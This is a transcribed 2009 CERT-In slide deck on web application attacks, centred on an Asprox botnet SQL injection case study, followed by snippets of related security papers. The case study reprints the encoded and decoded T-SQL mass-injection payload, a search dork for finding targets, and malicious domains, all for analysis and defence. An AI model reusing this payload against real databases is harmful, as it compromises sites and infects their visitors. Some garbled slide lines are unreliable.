Understanding Web Application Security Issues
|
|
- Hester Gibbs
- 7 years ago
- Views:
Transcription
1 Understanding Web Application Security Issues Pankaj Sharma January 30, 2009 Indian Computer Emergency Response Team ( CERT - IN ) Department Of Information Technology 1
2 Agenda Introduction What are Web Applications? Three-layered web application model. Secure Architecture & Threats Statistics of Application attacks in 2008 (April,May,June) Case Study Asprox Refrences Q&A 2
3 Web Applications? A web application is a program developed to perform a specific function directly for the user or for another application program. Web applications include code that resides on the Web servers, application servers, databases, and backend systems of an organization. Client/Server Software HTTP /HTTPS Browser Web Server 3
4 Three-layered web application model The first layer is normally a web browser or the user interface The second layer is the content generation technology tool such as Java servlets (JSP) or Active Server Pages (ASP), Third layer is the company database containing content (e.g., news) and customer data (e.g., usernames and passwords, social security numbers and credit card details). 4
5 Statistics of defacement in march 2008 In total 612 Indian websites were defaced during March
6 Vulnerabilities exploited for the defacements Multiple Vulnerabilities in Apache HTTP Server CIAD Cross Site Scripting Vulnerability in Apache mod_imap Module CIVN Apache Tomcat SingleSignOn Cookie Information Disclosure Weakness CVE phpmyadmin Local Information Disclosure CVE Apache Tomcat AJP Connector Information Disclosure CVE Apache Tomcat Cross-Site Scripting CVE
7 Attack Trend Mass SQL Injection attacks and malicious Java script embedding on websites (March,April, May 2008) Various websites have been infected with malicious JavaScript file (f**kjp DOT js) ). Remote attackers are launching a SQL injection attacks against web servers running ASP and embedding a link (www DOT DOT net/f**kjp DOT js) to malicious JavaScript file on these websites. When a user visits the infected websites, the code gets executed onto the user's system. Upon execution it tries to exploit several known vulnerabilities on the victim system to download some password stealing malware. The downloaded malware tries to make outbound connections to IP address 61 DOT 188 DOT 39 DOT 175 on port
8 Attack Trend It has also been reported that mass attacks were launched against websites running phpbb(php Bulletin Board ) through IFrame Injection redirecting innocent users to malicious websites. 8
9 Attack Trend Subsequently mass IFrame and JavaScript injection attacks have been reported using malicious domains. www DOT nmidahena DOT com www DOT nihaorr1 DOT com, www DOT aspder DOT com, haoliuliang DOT net, winzipices DOT cn, yl18 DOT net, www DOT bluell DOT cn, www DOT kisswow DOT com DOT cn, www DOT ririwow DOT cn, hxxp://updatead DOT com, hxxp://upgradead DOT com, hxxp://clsiduser DOT com and hxxp://dbdomaine DOT com. 9
10 Vulnerabilities exploited by the JavaScript file Microsoft Data Access Components Code Execution Vulnerability (CIVN ) Microsoft Windows Vector Markup Language Code Execution Vulnerability (CIVN ) Microsoft Internet Explorer "daxctle.ocx" KeyFrame Memory Vulnerability. (CIVN ) Microsoft Internet Explorer WebViewFolderIcon Buffer Overflow Vulnerability (CIVN ) RealPlayer Playlist Buffer overflow Vulnerability (CIVN ) 10
11 Countermeasures from CERT-In Enable request validation by setting validaterequest=truefalse in the Page directive or in the configuration section. Input Filtering: Properly sanitize user input data. Comment out malicious code: any scripting content to be safely commented out. Avoid cross-site scripting appending in URLs by using some special character like #,etc alert(document.cookie)<script> Output Filtering: Filter user data when it is sent back to the user s browser. Disable client side scripting. Use Signed Scripting: Implement signed scripting such that any script with an invalid or un-trusted signature would not run automatically. 11
12 Other Countermeasures Microsoft has released an advisory on June 24, 2008 suggesting steps to mitigate the risk from SQL Injection attack on websites running ASP.Net. For details refer to Microsoft Advisory : mspx A free scanner named Scrawlr has been developed by Hewlett Packard which can identify whether sites are susceptible to SQL injection. This tool and support for its use can be found at: gs/ spilabs/archive/2008/06/23/finding-sql-injection-withscrawlr. aspx 12
13 Statistics of defacement in June,2008 In total 342 Indian websites were defaced during June
14 Vulnerabilities exploited for the defacements Apache-SSL Authentication Bypass Vulnerability CIVN phpmyadmin Shared Host Remote Information Disclosure CVE Apache Tomcat SingleSignOn Cookie Information Disclosure Weakness CVE phpmyadmin Local Information Disclosure CVE Apache Tomcat Cross-Site Scripting CVE
15 Attack Trend SQL Injection Worm (April,May,June 2008) SQL Injection Worm spreading in the wild by injecting java scripts or iframe into websites. The Asprox botnet is also launching the SQL Injection attacks. 15
16 Attack Trend Many websites have been found infected with such scripts. 16
17 Attack Trend Websites injected with java scripts are redirecting innocent visitors to malicious website winzipices DOT cn which is containing java scripts with numeric names such as 2.js, 4.js. 17
18 Attack Trend The SQL injection worm is seems to be infecting machines using vulnerable Real Player versions. Malicious domains involved in attacks with SQL worm activity are cnzz DOT com, 51 DOT la, 51la DOT ajiang DOT net, and bbs DOT jueduizuan DOT com 18
19 Case Study(asprox) The Database Security and vulnerability Analysis Team of CERT-In thoroughly analyzed the attack and identified the vulnerabilities which were being exploited to compromise the website. After compromising the website, the attacker used the compromised host for further attacks over the internet. 19
20 Case Study(asprox) Environment: Operating system: Windows Server Web server: IIS Web application: ASP Method GET 20
21 Case Study (asprox) Investigation it was observed this SQL Injection attack carried out on IIS web server sites that ran with SQL Server as backend. Tool used to attack A sophisticated tool is used to scan the entire web for potentially weak sites running ASP.Net.This tool is called Danmec/Asprox SQL Injection Attack Tool. 21
22 Case Study (asprox) Asprox Asprox initiate Google queries searching for vulnerable ASP sites with the following query string: inurl:.asp inurl: a=. Parse the results and initiate the SQL injection attack Inject malicious JavaScript links into the back-end MS-SQL server database. If this is successful, the website will display the malicious JavaScript links in its output to clients. These links will force the user s browser to download other JavaScript code that will attempt to exploit browser flaws to install other Trojan software and perhaps steal user credentials. 22
23 Case Study (asprox) 23
24 Case Study (asprox) The attacker then the load the query string with encoded T-SQL. 24
25 Case Study (asprox) The input encoded T-SQL would look like: GET /home/vulnerable_site.asp D B D003D B C D003D D0 02B B B E006E D B D B B E006E D B D003D D F006E C B E006E D B B C D A002F002F C E006E F E006A E003C002F E B F006D F002E F A C F002E F006C D006E C F002E E D E E E D E E D E E E006E D D B D003D D B D003D E D002C E B C D C B D003D D B D B0 25
26 Case Study (asprox) After decoding the SQL code looked like: varchar(8000); select src=" from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='u' and b.xtype=c.xtype and c.name='varchar'; This SQL code would find all the fields with type VARCHAR from a JOIN between the sysobjects, syscolumns and systypes system tables in the databasethis SQL statement takes all rows from the sysobjects table with type U (user table). It then matches those objects with type varchar. Finally, for every such object it executes an update statement which results in appending the code shown above pointing to the yl18.net site. 26
27 Case Study (asprox) Another variation of the same type of SQL code is given below with a link to the JavaScript file 1.js. varchar(255); DECLARE Table_Cursor CURSOR FORSELECT a.name, b.name FROM sysobjects a, syscolumns b WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167); OPEN Table_Cursor; FETCH NEXT FROM WHILE (@@FETCH_STATUS = 0) BEGIN EXEC('update [' + '] set [' + '] = rtrim(convert(varchar,[' + ']))+ ''<script src= FETCH NEXT FROM END; CLOSE Table_Cursor; DEALLOCATE Table_Cursor; 27
28 Case Study (asprox) The above SQL code uses table cursors to enumerate all tables on MS SQL server and the respective columns that are of type ntext, text, nvarchar, or varchar and the table type is a user table and not a system table. The code then proceeds to utilize a cursor while loop to iterate through the returned results updating each table.columname concatenating it's current value with an arbitrary value. The code converts the current data to varchar during concatenation to avoid any cast issues and removes any trailing space to the right of the field value. The cursor is deallocated after update. So finally it finds all text fields in the database and adds a link to malicious JavaScript file to each field. These JavaScript files links will force the user s browser to download other JavaScript code that will attempt to exploit browser flaws to install other Trojan software and perhaps steal user credentials. 28
29 Identification Case Study (asprox) Identification of Attack Identification requires that database administrators (DBA) review all databases providing services to web applications. Review access controls and privileges granted to web application accounts. Privileges should not exceed those specified by the application owner. Look for the presence of unexpected HTML tags in records of the database related with the application. These unexpected HTML tags in application table records may be an indicator that the online service has been compromised and that immediate action is required. 29
30 Identification Case Study (asprox) Web Administrators should review server-side components of online services which access databases. Identify online service components with insufficient validation controls. Validation controls ensure the data conforms to the expected format, size and value. Identify online service components which allow, or are vulnerable to, improper data conversions. Data must be converted to its simplest form prior to being accepted for further processing. 30
31 Containment and Eradication (Case Study ) The following actions can be taken to mitigate the security risk: Shutdown the service until the system will recover fully from the attack. Validate the account that are used from the web application have least possible privilege in the database Implement strict database access controls to restrict online services to read only access; Implement filters that will convert dangerous data into an inoffensive form;(replace all unwanted html tags if any from the databases) Put the database offline or recover clean data from a backup. Monitoring tools for Web and Database server should be deployed. 31
32 Recommendations for Web developers Review the security of web application Review of online services security Review of network security Review IIS logs and database tables for signs of previous exploits Review of database security; Perform Vulnerability testing using specialized tools for online services, network and database security. Implement Application security best practices 32
33 Recommendation for Database Administrators Do security audit all databases used by web servers. DBA should particularly check for: The presence of unexpected HTML tags Database Administrators should search all tables for the presence of unexpected HTML tags such as: SCRIPT IFRAME FRAME 33
34 Recommendation for Database Administrators Review Access controls and privileges for web application. Review privileges to the following: SQL Statements SELECT, GRANT,, UPDATE, DELETE, GRANT etc. Data definition language elements (CREATE, ALTER etc.) Stored procedures 34
35 Secure Architecture 35
36 References
37 Thanks 37
Botnet-Powered SQL Injection Attacks A Deeper Look Within (VB, Sep. 2009) David Maciejak Guillaume Lovet
Botnet-Powered SQL Injection Attacks A Deeper Look Within (VB, Sep. 2009) David Maciejak Guillaume Lovet Agenda 1 2 3 The Beginning Attack Analysis Malicious Injected JS 4 Threat Evolution 5 Prevention
More informationSQL Injection 2.0: Bigger, Badder, Faster and More Dangerous Than Ever. Dana Tamir, Product Marketing Manager, Imperva
SQL Injection 2.0: Bigger, Badder, Faster and More Dangerous Than Ever Dana Tamir, Product Marketing Manager, Imperva Consider this: In the first half of 2008, SQL injection was the number one attack vector
More informationWeb Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange
More informationCreating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
More informationExternal Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
More informationWeb-Application Security
Web-Application Security Kristian Beilke Arbeitsgruppe Sichere Identität Fachbereich Mathematik und Informatik Freie Universität Berlin 29. Juni 2011 Overview Web Applications SQL Injection XSS Bad Practice
More informationWebapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
More informationWEB ATTACKS AND COUNTERMEASURES
WEB ATTACKS AND COUNTERMEASURES February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in
More informationThe Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions jburroughs@uk.ibm.com Agenda Current State of Web Application Security Understanding
More informationThick Client Application Security
Thick Client Application Security Arindam Mandal (arindam.mandal@paladion.net) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two
More informationWHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
More informationRecommended Practice Case Study: Cross-Site Scripting. February 2007
Recommended Practice Case Study: Cross-Site Scripting February 2007 iii ACKNOWLEDGEMENT This document was developed for the U.S. Department of Homeland Security to provide guidance for control system cyber
More informationAcunetix Website Audit. 5 November, 2014. Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build 20120808)
Acunetix Website Audit 5 November, 2014 Developer Report Generated by Acunetix WVS Reporter (v8.0 Build 20120808) Scan of http://filesbi.go.id:80/ Scan details Scan information Starttime 05/11/2014 14:44:06
More informationPenetration Test Report
Penetration Test Report Acme Test Company ACMEIT System 26 th November 2010 Executive Summary Info-Assure Ltd was engaged by Acme Test Company to perform an IT Health Check (ITHC) on the ACMEIT System
More informationCheck list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
More informationSQL Injection. Slides thanks to Prof. Shmatikov at UT Austin
SQL Injection Slides thanks to Prof. Shmatikov at UT Austin Dynamic Web Application GET / HTTP/1.0 Browser HTTP/1.1 200 OK Web server index.php Database server slide 2 PHP: Hypertext Preprocessor Server
More information[state of the internet] / SEO Attacks. Threat Advisory: Continuous Uptick in SEO Attacks
TLP: GREEN Issue Date: 1.12.16 Threat Advisory: Continuous Uptick in SEO Attacks Risk Factor High The Akamai Threat Research Team has identified a highly sophisticated Search Engine Optimization (SEO)
More informationSecure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
More informationFINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE
Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security
More informationWEB SECURITY. Oriana Kondakciu 0054118 Software Engineering 4C03 Project
WEB SECURITY Oriana Kondakciu 0054118 Software Engineering 4C03 Project The Internet is a collection of networks, in which the web servers construct autonomous systems. The data routing infrastructure
More informationFINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
More informationCracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
More informationHTTPParameter Pollution. ChrysostomosDaniel
HTTPParameter Pollution ChrysostomosDaniel Introduction Nowadays, many components from web applications are commonly run on the user s computer (such as Javascript), and not just on the application s provider
More informationCross-Site Scripting
Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer (fabrice.bodmer@unifr.ch) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some
More informationRIA SECURITY TECHNOLOGY
RIA SECURITY TECHNOLOGY Ulysses Wang Security Researcher, Websense Hermes Li Security Researcher, Websense 2009 Websense, Inc. All rights reserved. Agenda RIA Introduction Flash Security Attack Vectors
More informationCIS 433/533 - Computer and Network Security. Web Vulnerabilities, Wrapup
CIS 433/533 - Computer and Network Security Web Vulnerabilities, Wrapup Professor Kevin Butler Winter 2011 Computer and Information Science Injection Attacks flaws relating to invalid input handling which
More informationSECURING APACHE : THE BASICS - III
SECURING APACHE : THE BASICS - III Securing your applications learn how break-ins occur Shown in Figure 2 is a typical client-server Web architecture, which also indicates various attack vectors, or ways
More informationManipulating Microsoft SQL Server Using SQL Injection
Manipulating Microsoft SQL Server Using SQL Injection Author: Cesar Cerrudo (sqlsec@yahoo.com) APPLICATION SECURITY, INC. WEB: E-MAIL: INFO@APPSECINC.COM TEL: 1-866-9APPSEC 1-212-947-8787 INTRODUCTION
More informationLast update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
More informationClient vs. Server Implementations of Mitigating XSS Security Threats on Web Applications
Journal of Basic and Applied Engineering Research pp. 50-54 Krishi Sanskriti Publications http://www.krishisanskriti.org/jbaer.html Client vs. Server Implementations of Mitigating XSS Security Threats
More informationWeb Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure
Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences
More informationAdobe Systems Incorporated
Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...
More informationEC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.
CENTER FOR ADVANCED SECURITY TRAINING 619 Advanced SQLi Attacks and Countermeasures Make The Difference About Center of Advanced Security Training () The rapidly evolving information security landscape
More informationCommon Security Vulnerabilities in Online Payment Systems
Common Security Vulnerabilities in Online Payment Systems Author- Hitesh Malviya(Information Security analyst) Qualifications: C!EH, EC!SA, MCITP, CCNA, MCP Current Position: CEO at HCF Infosec Limited
More informationOut of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development
More informationIs Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
More informationCross Site Scripting in Joomla Acajoom Component
Whitepaper Cross Site Scripting in Joomla Acajoom Component Vandan Joshi December 2011 TABLE OF CONTENTS Abstract... 3 Introduction... 3 A Likely Scenario... 5 The Exploit... 9 The Impact... 12 Recommended
More information3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org
More informationThe purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.
This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out
More informationCSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications
More informationWeb Application Worms & Browser Insecurity
Web Application Worms & Browser Insecurity Mike Shema Welcome Background Hacking Exposed: Web Applications The Anti-Hacker Toolkit Hack Notes: Web Security Currently working at Qualys
More informationIndian Computer Emergency Response Team (CERT-In) Annual Report (2010)
Indian Computer Emergency Response Team (CERT-In) Annual Report (2010) Indian Computer Emergency Response Team (CERT-In) Department of Information Technology Ministry of Communications & Information Technology
More informationWeb Application Security
E-SPIN PROFESSIONAL BOOK Vulnerability Management Web Application Security ALL THE PRACTICAL KNOW HOW AND HOW TO RELATED TO THE SUBJECT MATTERS. COMBATING THE WEB VULNERABILITY THREAT Editor s Summary
More informationWeb Application Security Assessment and Vulnerability Mitigation Tests
White paper BMC Remedy Action Request System 7.6.04 Web Application Security Assessment and Vulnerability Mitigation Tests January 2011 www.bmc.com Contacting BMC Software You can access the BMC Software
More informationDetecting and Exploiting XSS with Xenotix XSS Exploit Framework
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework ajin25@gmail.com keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.
More informationBLIND SQL INJECTION (UBC)
WaveFront Consulting Group BLIND SQL INJECTION (UBC) Rui Pereira,B.Sc.(Hons),CISSP,CIPS ISP,CISA,CWNA,CPTS/CPTE WaveFront Consulting Group Ltd ruiper@wavefrontcg.com www.wavefrontcg.com 1 This material
More informationJava Web Application Security
Java Web Application Security RJUG Nov 11, 2003 Durkee Consulting www.rd1.net 1 Ralph Durkee SANS Certified Mentor/Instructor SANS GIAC Network Security and Software Development Consulting Durkee Consulting
More informationColumbia University Web Security Standards and Practices. Objective and Scope
Columbia University Web Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Security Standards and Practices document establishes a baseline of security related requirements
More informationCriteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
More informationTechnical Findings Sample Report
Technical Findings Sample Report A B C C o m p a n y S a m p l e S e c u r i t y A s s e s s m e n t 2 5 0 S c i e n t i f i c D r i v e S u i t e 3 0 0 N o r c r o s s G A 3 0 0 9 2 P h o n e N u m b
More informationABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST
ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST Performed Between Testing start date and end date By SSL247 Limited SSL247 Limited 63, Lisson Street Marylebone London
More informationMCAFEE FOUNDSTONE FSL UPDATE
MCAFEE FOUNDSTONE FSL UPDATE 2012-JUN-13 To better protect your environment McAfee has created this FSL check update for the Foundstone Product Suite. The following is a detailed summary of the new and
More informationStill Aren't Doing. Frank Kim
Ten Things Web Developers Still Aren't Doing Frank Kim Think Security Consulting Background Frank Kim Consultant, Think Security Consulting Security in the SDLC SANS Author & Instructor DEV541 Secure Coding
More informationIntroduction to Computer Security
Introduction to Computer Security Web Application Security Pavel Laskov Wilhelm Schickard Institute for Computer Science Modern threat landscape The majority of modern vulnerabilities are found in web
More informationSitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
More informationOWASP Top Ten Tools and Tactics
OWASP Top Ten Tools and Tactics Russ McRee Copyright 2012 HolisticInfoSec.org SANSFIRE 2012 10 JULY Welcome Manager, Security Analytics for Microsoft Online Services Security & Compliance Writer (toolsmith),
More informationWHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6
WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL Ensuring Compliance for PCI DSS 6.5 and 6.6 CONTENTS 04 04 06 08 11 12 13 Overview Payment Card Industry Data Security Standard PCI Compliance for Web Applications
More information(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
More informationWhere every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
More informationWeb Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
More informationIntegrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com
SAINT Integrated Network Vulnerability Scanning and Penetration Testing www.saintcorporation.com Introduction While network vulnerability scanning is an important tool in proactive network security, penetration
More informationData Breaches and Web Servers: The Giant Sucking Sound
Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant
More informationArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
More informationSECURITY ADVISORY. December 2008 Barracuda Load Balancer admin login Cross-site Scripting
SECURITY ADVISORY December 2008 Barracuda Load Balancer admin login Cross-site Scripting Discovered in December 2008 by FortConsult s Security Research Team/Jan Skovgren WARNING NOT FOR DISCLOSURE BEFORE
More informationWeb Application Report
Web Application Report This report includes important security information about your Web Application. Security Report This report was created by IBM Rational AppScan 8.5.0.1 11/14/2012 8:52:13 AM 11/14/2012
More informationShellshock. Oz Elisyan & Maxim Zavodchik
Shellshock By Oz Elisyan & Maxim Zavodchik INTRODUCTION Once a high profile vulnerability is released to the public, there will be a lot of people who will use the opportunity to take advantage on vulnerable
More informationWeb Vulnerability Assessment Report
Web Vulnerability Assessment Report Target Scanned: www.daflavan.com Report Generated: Mon May 5 14:43:24 2014 Identified Vulnerabilities: 39 Threat Level: High Screenshot of www.daflavan.com HomePage
More informationWhat is Web Security? Motivation
brucker@inf.ethz.ch http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
More informationMatriXay WEB Application Vulnerability Scanner V 5.0. 1. Overview. (DAS- WEBScan ) - - - - - The best WEB application assessment tool
MatriXay DAS-WEBScan MatriXay WEB Application Vulnerability Scanner V 5.0 (DAS- WEBScan ) - - - - - The best WEB application assessment tool 1. Overview MatriXay DAS- Webscan is a specific application
More informationWeb application security: Testing for vulnerabilities
Web application security: Testing for vulnerabilities Using open source tools to test your site Jeff Orloff Technology Coordinator/Consultant Sequoia Media Services Inc. Skill Level: Intermediate Date:
More informationBug Report. Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca)
Bug Report Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca) Software: Kimai Version: 0.9.1.1205 Website: http://www.kimai.org Description: Kimai is a web based time-tracking application.
More informationAdvancements in Botnet Attacks and Malware Distribution
Advancements in Botnet Attacks and Malware Distribution HOPE Conference, New York, July 2012 Aditya K Sood Rohit Bansal Richard J Enbody SecNiche Security Department of Computer Science and Engineering
More informationThreat Modeling. Categorizing the nature and severity of system vulnerabilities. John B. Dickson, CISSP
Threat Modeling Categorizing the nature and severity of system vulnerabilities John B. Dickson, CISSP What is Threat Modeling? Structured approach to identifying, quantifying, and addressing threats. Threat
More informationINDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION
INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION Prepared for the NRC Fuel Cycle Cyber Security Threat Conference Presented by: Jon Chugg, Ken Rohde Organization(s): INL Date: May 30, 2013 Disclaimer
More informationHow I hacked PacketStorm (1988-2000)
Outline Recap Secure Programming Lecture 8++: SQL Injection David Aspinall, Informatics @ Edinburgh 13th February 2014 Overview Some past attacks Reminder: basics Classification Injection route and motive
More informationOverview of SQL Injection
Overview of SQL Injection From Web Sources by J. Scott, 10/2009 Page 1 of 10 Overview of SQL Injection This white paper assumes you have a working knowledge of SQL injection. However, a brief refresher
More informationASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus
ASP.NET MVC Secure Coding 4-Day hands on Course Course Syllabus Course description ASP.NET MVC Secure Coding 4-Day hands on Course Secure programming is the best defense against hackers. This multilayered
More informationSecurity Awareness For Website Administrators. State of Illinois Central Management Services Security and Compliance Solutions
Security Awareness For Website Administrators State of Illinois Central Management Services Security and Compliance Solutions Common Myths Myths I m a small target My data is not important enough We ve
More informationWHITE PAPER. FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6
WHITE PAPER FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6 Ensuring compliance for PCI DSS 6.5 and 6.6 Page 2 Overview Web applications and the elements surrounding them
More informationMetasploit The Elixir of Network Security
Metasploit The Elixir of Network Security Harish Chowdhary Software Quality Engineer, Aricent Technologies Shubham Mittal Penetration Testing Engineer, Iviz Security And Your Situation Would Be Main Goal
More informationSecure Web Development Teaching Modules 1. Threat Assessment
Secure Web Development Teaching Modules 1 Threat Assessment Contents 1 Concepts... 1 1.1 Software Assurance Maturity Model... 1 1.2 Security practices for construction... 3 1.3 Web application security
More informationTo Cache a Thief Using database caches to detect SQL injection attacks. Kevvie Fowler, CISSP, GCFA Gold, MCTS, MCDBA, MCSD, MCSE
To Cache a Thief Using database caches to detect SQL injection attacks Kevvie Fowler, CISSP, GCFA Gold, MCTS, MCDBA, MCSD, MCSE About me Day job: Director Security Services, TELUS backed by Emergis Night
More informationWEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
More informationPenetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: info@acumen-innovations.com
More informationGuidelines for Website Security and Security Counter Measures for e-e Governance Project
and Security Counter Measures for e-e Governance Project Mr. Lalthlamuana PIO, DoICT Background (1/8) Nature of Cyber Space Proliferation of Information Technology Rapid Growth in Internet Increasing Online
More informationAnnex B - Content Management System (CMS) Qualifying Procedure
Page 1 DEPARTMENT OF Version: 1.5 Effective: December 18, 2014 Annex B - Content Management System (CMS) Qualifying Procedure This document is an annex to the Government Web Hosting Service (GWHS) Memorandum
More informationBank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM
Bank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM Agenda Introduction to Application Hacking Demonstration of Attack Tool Common Web Application Attacks Live Bank Hacking Demonstration
More informationColumbia University Web Application Security Standards and Practices. Objective and Scope
Columbia University Web Application Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Application Security Standards and Practices document establishes a baseline
More informationWeb Application Vulnerabilities and Avoiding Application Exposure
Web Application Vulnerabilities and Avoiding Application Exposure The introduction of BIG-IP Application Security Manager (ASM) version 9.4.2 marks a major step forward. BIG-IP ASM now offers more features
